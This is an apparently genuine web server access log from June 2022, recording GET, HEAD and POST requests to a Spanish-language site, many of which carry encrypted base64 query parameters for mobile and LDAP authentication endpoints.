186.29.170.244 - - [16/Jun/2022:06:25:17 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19HFzlkDheVIvoS78eg7fLP8SLAShJ6zX2yOhT3sxzreSGJDlDTxmYSJWLlFiqa6RiULFG3Xeu/leYfOEEcUkdG9CcVBixTXIZQNwcjBuDkmXJ1bexSWQsli2SN1+Mb/Nh8LZ2jUs8uCW2xd5gmtyCri0R5SQg5y4oE0/jeZQoHiyAnHJLmr5IYqAgDyVEcsXRf2urP6bOXSnOl+kEf9GpN2Uh2R8JUER6qD9gvveLiHFmUpZ9k0kz+3yGEIIeeM6792HPHQ7lG6x3ZIdtIMedPY2cRekwwF0POoo4A2cLYvOg5p1V2rIFW1mrlnEE3rGgHa0Y/CgCY6vbBUyRy+qUwKfOQnfx7VhaNaDQT+0yBF2W7PIBCWPhtBPpYv3Ignvb0X84gt31QSmzPYSocm1PAE7mDIEaT+4BOW42WX1MxuSYZq3OaqZeaPoi31J0guCrCjLNAEA7NqJ6kX2iJGlnyIC3ciFI9f3ttcWpP2RVroJK63c/nZDpXX02BiL9ZJYg0UuXAipDI5EfwbTsaKPzK1kzFvMNMjRprWL8E022DfVCWOZVyaaI5swp7Ye7z+7i64k8ykueva8xA5Huyrjt1c/+Mm9V0UKjoznGEgMwKQluLc+G1JiqEtp8eEw+DJ8RD7S2aY9e+FFigH7Ds1uDIhtntwh+P8Bq+2rGsNhmb51l6TIBGMDn0T1cmwmSdkV0T72mK2gM56mTjzNpSsjT6U2nX0V2Z77qkJXqe6xy86kuoU4kSbjEpxz8SUISNc3OGekBdB63hSokndU+7tOrj6sMT+W97kPNyi+08b9GIdUE8kw9yn7CHKPi+Qhe2YhMjlcgp1XsLtmSe0yQybOA8ULXwdrbINFSIKLAruoC+TS3eSK8NECILxkxOb+cEsgpYqMpc3Sie13VW7d59T7szUkdJwPYZdISL8rlx83wS8Q1AsMiVSb9OyesffE9RBT/bOpDS3eaZ+jdWL0+6QKeCyco0RVh2WfYahm8+lHfrrhR+teYqqVR9nJ4OctSigXo9BhrEMMDl9+799RjWX+NjmqjJOfeqyAQ+iNyhs5JtL5oX8PjrMZLi9xh5RsN9OxI2yX3ZMA/gWGdoFEOCnJXNgqNFpWy/e2ZGDCiYp3kf44438yPbUj/QBXr+2PCOWASvF4XvDErB6PjMSM9xOGoWHz2uMUqsCD2lvkYaxya+o5z0sdemNj9ZP3MXmJGzmbDUq+pAl7PNMm06T64YRNGVR2Yq/KhWwNPWlEE2rZTAiFOVqYdvwmzEwbHOH/1/Z6skJDH2CCbvqsrTPbOGFSU3KhWQ1/QwCA7mH5++jdZtUgc6OBtx9q24hcM0/EFWWionpr5rAjzaeiBcE/cbyIEyUKUoTwzSwhc=&u=U2FsdGVkX19qR4DMyi4YNPUFUjUc5zgBI9Tbugc5SKtJ2VfgmFqdoDF8DuzGtOJF&y=U2FsdGVkX18GPmhq0Iylr4bGXVVJTdMcK3yk8gtZlgdciIUObv3G8j/fV/NX0Ew1 HTTP/1.1" 200 8094
186.29.170.244 - - [16/Jun/2022:06:25:17 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18NpcXY/ci5ckxc9Cfeyzatg1HyTRBt96A/rNGKEvCXp8nGBZr9EoorzoxXhdTWZpV67L/i8JBgcyy6sPjvdcIyu8ioRCCBOFY8ioys7yBEW1TtlEinnoORxGd/gfQRg9TGSnCbWwH2Jb9m0GZhzhZrc8uYXI6CGH52HFROkYGox4N/SCJcQW2vAaJchJR7lLfG90nOmBDte79HQbEt6iqBgEHL0P5cyh4O3uUvrORB7fHuarpZw4QZaPsLP/j5zX74Ny7MxIByfCw+HCuuavEFD9B0Jc7aDb4=&u=U2FsdGVkX19qR4DMyi4YNPUFUjUc5zgBI9Tbugc5SKtJ2VfgmFqdoDF8DuzGtOJF&y=U2FsdGVkX18GPmhq0Iylr4bGXVVJTdMcK3yk8gtZlgdciIUObv3G8j/fV/NX0Ew1 HTTP/1.1" 200 176
186.29.170.244 - - [16/Jun/2022:06:25:17 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX18KSr7cnnmzR4h2O70wqBVdS2cVg7qY0bb2cL+duE/wHIyMYBqcFPro HTTP/1.1" 200 30992
172.22.2.4 - - [16/Jun/2022:06:24:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61027
2.57.122.35 - - [16/Jun/2022:06:26:11 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [16/Jun/2022:06:26:36 -0500] "HEAD / HTTP/1.1" 200 -
173.252.107.6 - - [16/Jun/2022:06:30:00 -0500] "GET /bogota-tendra-una-nueva-reciclaton-empresarial.html HTTP/1.1" 206 886
172.22.2.4 - - [16/Jun/2022:06:29:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [16/Jun/2022:06:31:36 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:06:30:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61027
201.245.192.253 - - [16/Jun/2022:06:31:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46956
201.245.192.253 - - [16/Jun/2022:06:32:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47431
186.28.206.220 - - [16/Jun/2022:06:34:28 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX19sdqnYnDNAD1jZGBLENKWMs1KgbxLQ2jc0yioyeURMXQyw7TVfZ2Rh&y=U2FsdGVkX1+ORjVEj/9/VfsAFik+SyyZlQrFdfUBaWzmi4f9prM2X61c2FwPeJXl HTTP/1.1" 200 30
186.28.206.220 - - [16/Jun/2022:06:34:30 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/AljPXrF95bTs/kF2aeyTWS0K1fl3Ha/ux0wQywJ502T/1CwkIUH7V&y=U2FsdGVkX1+ngNsm1kvch7o1wMeHhEONAnqfK0ut88HQZhNM85v3aGmcbcNUjP7Q HTTP/1.1" 200 30
186.28.206.220 - - [16/Jun/2022:06:34:32 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+txUMhb2HdU0QLAAt2Pc5403aJ3WOTS7ycp5aPoRSfLHi86R+IHg0o5fMOOHpLSnjEcx/xXJWrf8HXh07cCB6Dj1kVnuVaTAE=&u=U2FsdGVkX19g4FFH7UCagSP64mfdLAmd+Gbs+5eqVmjcl4wvRhUC5KRAGwAnkP5F&y=U2FsdGVkX1+ORjVEj/9/VfsAFik+SyyZlQrFdfUBaWzmi4f9prM2X61c2FwPeJXl HTTP/1.1" 200 66
186.28.206.220 - - [16/Jun/2022:06:34:33 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX18cUAucqxc3Ifben9lwD+kwenstMOfrV7NA8Ka51QeoHwcAuHV/c3Ox&y=U2FsdGVkX1+6KQfZTuFYCdhZOAP77rpyg1DbLsvhhS1m6MdA+tLl924Illmf1t/V HTTP/1.1" 200 30
186.28.206.220 - - [16/Jun/2022:06:34:33 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX184QcwzfGR0nNUXuMKrPKQ+peKpM7r+qmzG6GkjASxByuvZuN9jEhcu+FDr2aItzsSyrCZCHO7ZSOqj3egbErWZKuRDWX6RHDs=&u=U2FsdGVkX19BgN+Ed09K7ZFIRR/IVw7tmkEejBGo3VJ/2MxnuMpODG8SaiWp0sg6&y=U2FsdGVkX1+ngNsm1kvch7o1wMeHhEONAnqfK0ut88HQZhNM85v3aGmcbcNUjP7Q HTTP/1.1" 200 66
